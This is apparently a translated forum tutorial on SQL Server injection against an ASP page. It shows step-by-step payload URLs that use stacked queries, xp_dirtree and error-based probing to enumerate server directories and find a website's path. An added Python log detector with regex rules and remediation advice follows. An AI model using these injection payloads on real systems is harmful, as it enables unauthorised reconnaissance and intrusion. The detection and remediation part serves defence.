Several SQL Server methods for obtaining a website's path, with a comparison. If the website only opens port 80, you will find the following methods more useful; I have almost never seen them used elsewhere. There are four methods from my personal injection experience (currently known).
Method 1:
This comes from "Weird SQL Injection" (怪异的sql注入).
It takes advantage of SQL Server's xp_dirtree. Okay, let's look at the method first, then talk about its advantages and disadvantages (based on the original article).
Create a table
Statement: http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000))--
Return: normal. The table was created successfully! Continue!
(This is a little bigger than the original one, because I deleted the id of a file with a long name, since it is useless.)
Statement: http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'C:/'--
Return: normal. This indicates that all the directories on drive C were written successfully! Great! The next step is to read the table back! Let's go. (It seems this is the only method.)
Statement: http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-
Return: Microsoft ole db Provider for SQL Server error 80040e07
A syntax error occurs when you convert the varchar value '@inetpub' to a column whose data type is int.
The directory name in the table is displayed in sequence!
Statement: http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in ('@inetpub'))--
Return: Microsoft ole db Provider for SQL Server error 80040e07
A syntax error occurs when you convert the varchar value 'test' to a column whose data type is int.
The directory name in the table is displayed in sequence!
Okay, let's continue.
Statement:
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in ('@inetpub', 'test'))--
Return: Microsoft ole db Provider for SQL Server error 80040e07
A syntax error occurs when the varchar value 'hahaha' is converted to a column whose data type is int.
The directory name in the table is displayed in sequence!
Well, by now you should know how to do it, haha: you just keep adding each name you obtain to the list inside the brackets.
Tips:
Sometimes you will find that when you enter something like
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-
no error is displayed and the web page shows normally.
Dizzy? Don't be nervous.
If 0<>(select top 1 paths from dirs) returns normally, it means a number was returned,
haha, so test it to see what it is.
100>(select top 1 paths from dirs)
Returns normal.
Haha, with greater-than and less-than you can quickly narrow it down.
Okay, let's continue.
For example
59=(select top 1 paths from dirs)
returns normally,
OK, the name is 59.
Enter the following:
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in ('59'))--
Remember to enclose it in quotation marks.
The rest of the method is the same as the original one.
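From the defender's side, the requests in the method and the tip above leave a very recognisable trail in the web-server log: stacked queries creating a table, `insert ... exec` with `xp_dirtree`, and a long run of `0<>(select top 1 ...)` / `not in (...)` probes that produce 500 errors. The detector below is an added example, not part of the original post; it assumes an IIS W3C-style field order and scans constructed log lines.

```python
"""Flag the stacked-query, xp_dirtree and error-based probes above in
IIS W3C-style log lines (added example, not from the original post)."""
import re
from urllib.parse import unquote_plus
# (rule name, regex applied to the normalised query string)
RULES = [
    ("stacked-create-table", re.compile(r";\s*create\s+table\b")),
    ("insert-exec", re.compile(r"\binsert\s+\w+\s+exec\b")),
    ("xp_dirtree", re.compile(r"\bxp_dirtree\b")),
    ("error-based-compare", re.compile(r"\b0\s*<>\s*\(\s*select\s+top\s+1\b")),
    ("not-in-walk", re.compile(r"\bnot\s+in\s*\(")),
    ("numeric-guess", re.compile(r"\b\d+\s*[<>=]=?\s*\(\s*select\s+top\s+1\b")),
]

def normalise(query: str) -> str:
    """URL-decode twice (catches double encoding), lower-case and collapse
    whitespace so spacing or case tricks do not evade the regexes."""
    decoded = unquote_plus(unquote_plus(query))
    return re.sub(r"\s+", " ", decoded.lower())

def scan_line(line: str) -> list[str]:
    """Rules matching one line with the (assumed) field order:
    date time c-ip cs-method cs-uri-stem cs-uri-query sc-status"""
    parts = line.split()
    if len(parts) < 7 or parts[5] == "-":
        return []
    query = normalise(parts[5])
    return [name for name, rx in RULES if rx.search(query)]

def scan_log(text: str) -> list[tuple[int, str, list[str]]]:
    """(line number, HTTP status, matched rules) for every flagged line."""
    hits = []
    for number, line in enumerate(text.splitlines(), 1):
        rules = scan_line(line)
        if rules:
            hits.append((number, line.split()[6], rules))
    return hits

# Constructed log excerpt mirroring the requests shown in the post.
SAMPLE_LOG = """\
2004-05-01 10:00:01 10.0.0.5 GET /down/list.asp id=1 200
2004-05-01 10:00:07 10.0.0.5 GET /down/list.asp id=1;create+table+dirs(paths+varchar(1000))-- 200
2004-05-01 10:00:12 10.0.0.5 GET /down/list.asp id=1;insert+dirs+exec+master.dbo.xp_dirtree+%27C:%5C%27-- 200
2004-05-01 10:00:20 10.0.0.5 GET /down/list.asp id=1+and+0%3C%3E(select+top+1+paths+from+dirs)-- 500
2004-05-01 10:00:31 10.0.0.5 GET /down/list.asp id=1+and+0%3C%3E(select+top+1+paths+from+dirs+where+paths+not+in+(%27inetpub%27))-- 500
2004-05-01 10:00:40 10.0.0.5 GET /down/list.asp id=1+and+100%3E(select+top+1+paths+from+dirs)-- 200
"""

if __name__ == "__main__":
    for number, status, rules in scan_log(SAMPLE_LOG):
        print(f"line {number} status {status}: {', '.join(rules)}")
```

A burst of hits from one client, especially `error-based-compare` lines with 500 statuses, is the signature of the directory walk; the underlying fix is parameterising the `id` query and running the application under a login that cannot execute `xp_dirtree` or create tables.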